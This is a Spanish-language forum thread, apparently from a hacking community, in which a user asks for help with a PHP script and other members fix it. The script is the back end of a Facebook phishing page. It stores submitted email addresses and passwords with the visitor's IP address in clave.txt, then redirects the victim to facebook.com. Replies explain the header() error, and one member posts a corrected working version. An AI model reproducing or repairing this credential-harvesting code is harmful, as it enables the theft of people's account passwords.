[SOLUCIONADO] DUDA: ¿Cual es el error PHP?

Iniciado por DUDA, Febrero 07, 2017, 11:35:43 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Febrero 07, 2017, 11:35:43 AM Ultima modificación: Febrero 10, 2017, 09:27:20 PM por Stiuvert
Hola comunidad under, comparto un archivo php que almacena datos y los exporta a un archivo clave.txt, despues de ello la deberá redireccionar a una web externa, el problema es que me arroja el siguiente error al final y no redirecciona: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero si logra guardar la data en el archivo que indiqué.

Comparto el código para su ayuda:

Código: php
 <?php 
    $usuario = $_POST[ 'email' ];
    $password = $_POST[ 'pass' ];
    $ip = $_SERVER[ 'REMOTE_ADDR' ];
     
    if( ( empty($usuario)) or (empty($password)) ){
        header('location: index.htm');
    }else{ 
            //guarderemos en un archivo de texto
            $file = fopen('clave.txt','a+');
            fwrite($file, "usuario: ".$usuario."\r\ncontraseña: ".$password."\r\nIP: ".$ip."\r\n=========================\r\n");
            fclose($file);
            header('location: http://facebook.com/');     
    }
    ?>


Saludos,
!Duda

El código en principio es correcto , la imagen  no la he podido ver  te aconsejo utilices imgur o servicios de este tipo y luego con etiquetas que están en tu menú de edición del post incluyas las imágenes.

Por otro lado es horrible la lectura del código he tenido que hacer un select dentro de la sección del source para poder leer el código pero eso no es culpa tuya, los jefes deberian tomar cartas en el asunto ya que tanto colorido  es muy dificil la lectura.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El código en principio es correcto , la imagen  no la he podido ver  te aconsejo utilices imgur o servicios de este tipo y luego con etiquetas  que están en tu menú de edición del post incluyas las imágenes.

Por otro lado es horrible la lectura del código he tenido que hacer un select dentro de la sección del source para poder leer el código pero eso no es culpa tuya, los jefes deberian tomar cartas en el asunto ya que tanto colorido  es muy dificil la lectura.

Gracias por tu tiempo Hu3co en revisar mi post, te comparto la imagen del error que me salta:




Hola @!Duda,

El código lo veo bien (quizás sea algún detalle), pero antes de ponernos a revisarlo a fondo, comprueba que tengas los permisos correctos tanto en el fichero php, como en el .txt y en el directorio que los aloja.

Un saludo.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @!Duda,

El código lo veo bien (quizás sea algún detalle), pero antes de ponernos a revisarlo a fondo, comprueba que tengas los permisos correctos tanto en el fichero php, como en el .txt y en el directorio que los aloja.

Un saludo.

Los permisos están correctos, 755 para directorio y 644 los archivos, estos están en CentOS Linux con apache, no creo que sea un problema de permisos.

Saludos,
!Duda

El problema solo está en la siguiente línea:

Código: php
header('location: http://facebook.com/');  


Si la comento no arroja error y puesto como no hay una función adicional, se queda en blanco la web, sin embargo quiero que redireccione a la url indicada, ahora, CON O SIN comentario //, el php funciona, arroja el pass y user.

Saludos,
!Duda

Prueba a poner Location con la primera L en mayúsculas es lo único que se me van los OjOs.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Eso pasa porque antes estás imprimiendo algo, procura que no hayan espacios antes del header() ni prints, ni nada... si este es un archivo que llamas con include o require revisa igual el archivo que lo llama.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Acepta con humildad y aprecio que en la vida la muerte es inevitable y amarás ésta, adorando la muerte

A que te refieres con los espacios antes del header? Podrias dar un ejemplo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Eso pasa porque antes estás imprimiendo algo, procura que no hayan espacios antes del header() ni prints, ni nada... si este es un archivo que llamas con include o require revisa igual el archivo que lo llama.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
A que te refieres con los espacios antes del header? Podrias dar un ejemplo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Eso pasa porque antes estás imprimiendo algo, procura que no hayan espacios antes del header() ni prints, ni nada... si este es un archivo que llamas con include o require revisa igual el archivo que lo llama.

por ejemplo si tienes un echo, o un print o html antes, etc... incluso a veces simplemente por tener espacios antes de <?php o cualquier carácter...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Acepta con humildad y aprecio que en la vida la muerte es inevitable y amarás ésta, adorando la muerte

Febrero 08, 2017, 06:24:58 AM #10 Ultima modificación: Febrero 08, 2017, 06:35:43 AM por Jimeno
Código: php

<?php
//error_reporting(0);
$usuario = "xd";
$password = "lmao";
$ip = "127.0.0.1";
         
if( ( empty($usuario)) || (empty($password)) ){
    header('Location: index.htm');
} else {
    //guarderemos en un archivo de texto
    $file = fopen('clave.txt','a+');
    fwrite($file, "usuario: ".$usuario."\ncontraseña: ".$password."\nIP: ".$ip."\n=========================\n");
    fclose($file);
    //echo("usuario: ".$usuario."\r\ncontraseña: ".$password."\r\nIP: ".$ip."\r\n=========================\r\n");
    header('Location: https://facebook.com/');     
}



Un saludo.
Contacto: @migueljimeno96 -

¡Eres grande! ¡Gracias!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: php

<?php
//error_reporting(0);
$usuario = "xd";
$password = "lmao";
$ip = "127.0.0.1";
         
if( ( empty($usuario)) || (empty($password)) ){
    header('Location: index.htm');
} else {
    //guarderemos en un archivo de texto
    $file = fopen('clave.txt','a+');
    fwrite($file, "usuario: ".$usuario."\ncontraseña: ".$password."\nIP: ".$ip."\n=========================\n");
    fclose($file);
    //echo("usuario: ".$usuario."\r\ncontraseña: ".$password."\r\nIP: ".$ip."\r\n=========================\r\n");
    header('Location: https://facebook.com/');     
}



Un saludo.